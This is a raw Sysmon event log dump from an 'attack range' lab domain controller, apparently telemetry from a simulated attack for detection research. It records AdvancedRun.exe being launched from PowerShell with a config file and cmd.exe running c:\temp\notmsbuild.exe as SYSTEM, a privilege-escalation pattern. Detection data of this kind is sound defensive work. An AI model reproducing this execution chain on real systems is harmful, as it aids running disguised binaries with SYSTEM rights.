19:56:09.199{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.199{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.198{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.197{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.197{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.195{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.194{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.193{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.193{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.192{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.190{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004057017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.189{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004057016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.186{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004057015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.185{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004057014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.180{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004016263Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.192{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004016256Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.191{834264DD-0044-61EB-FE05-000000002702}508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\notmsbuild.exeC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004016255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004016254Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-0044-61EB-FD05-000000002702}2772C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004016253Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016252Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0044-61EB-FC05-000000002702}2148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016251Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016250Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016249Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004016248Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:40.177{834264DD-0044-61EB-FD05-000000002702}2772344C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FFA8-61EA-E505-000000002702}6012C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004016247Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 